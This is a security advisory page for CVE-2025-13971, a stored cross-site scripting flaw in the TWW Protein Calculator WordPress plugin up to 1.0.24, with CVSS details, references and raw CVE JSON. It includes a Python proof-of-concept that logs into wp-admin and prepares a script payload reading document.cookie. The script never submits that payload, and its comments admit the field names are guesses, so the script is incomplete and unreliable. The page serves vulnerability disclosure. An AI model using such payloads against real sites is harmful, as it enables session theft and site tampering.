Security Vulnerability Report

CVE-2025-13971 (CVSS 4.4, MEDIUM)

Published: 2025-12-12 04:15:45
Last Modified: 2026-04-15 00:35:42

Description

The TWW Protein Calculator plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'Header' setting in all versions up to, and including, 1.0.24 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.

CVSS Details

CVSS Score: 4.4
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration (CPE) data available.

Affected product: TWW Protein Calculator plugin <= 1.0.24 (all versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-13971 PoC - TWW Protein Calculator Stored XSS
# Affected: TWW Protein Calculator plugin <= 1.0.24 for WordPress
import requests
from bs4 import BeautifulSoup

TARGET_URL = "http://target-wordpress-site.com"
USERNAME = "admin"
PASSWORD = "admin_password"

session = requests.Session()

# Step 1: Login to WordPress admin
login_url = f"{TARGET_URL}/wp-login.php"
login_data = {
    "log": USERNAME,
    "pwd": PASSWORD,
    "wp-submit": "Log In",
    "redirect_to": "/wp-admin/",
    "testcookie": "1",
}
session.post(login_url, data=login_data)

# Step 2: Navigate to plugin settings page
settings_url = f"{TARGET_URL}/wp-admin/admin.php?page=twwc-protein-settings"
response = session.get(settings_url)

# Step 3: Inject XSS payload in Header setting
# Payload: <script>alert(document.cookie)</script>
xss_payload = '<script>alert(document.cookie)</script>'
settings_data = {
    "twwc_header": xss_payload,
    "submit": "Save Changes",
}
# Note: Actual form action and field names need to be identified from the plugin
# This PoC demonstrates the attack vector, actual implementation varies

print(f"[*] Sending XSS payload: {xss_payload}")
print(f"[*] Target: {settings_url}")
print("[*] Payload will execute when any user views pages using the plugin")
```

References

- https://plugins.trac.wordpress.org/browser/twwc-protein/tags/1.0.24/templates/protein-calculator-compact.php#L19
- https://plugins.trac.wordpress.org/browser/twwc-protein/tags/1.0.24/templates/protein-calculator-large.php#L32
- https://plugins.trac.wordpress.org/browser/twwc-protein/trunk/templates/protein-calculator-compact.php#L19
- https://plugins.trac.wordpress.org/browser/twwc-protein/trunk/templates/protein-calculator-large.php#L32
- https://www.wordfence.com/threat-intel/vulnerabilities/id/b57749db-0a47-44f8-8607-d0d962c5ced2?source=cve

Raw JSON Data

```json
{"cve": {"id": "CVE-2025-13971", "sourceIdentifier": "[email protected]", "published": "2025-12-12T04:15:45.010", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The TWW Protein Calculator plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'Header' setting in all versions up to, and including, 1.0.24 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N", "baseScore": 4.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/twwc-protein/tags/1.0.24/templates/protein-calculator-compact.php#L19", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/twwc-protein/tags/1.0.24/templates/protein-calculator-large.php#L32", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/twwc-protein/trunk/templates/protein-calculator-compact.php#L19", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/twwc-protein/trunk/templates/protein-calculator-large.php#L32", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/b57749db-0a47-44f8-8607-d0d962c5ced2?source=cve", "source": "[email protected]"}]}}
```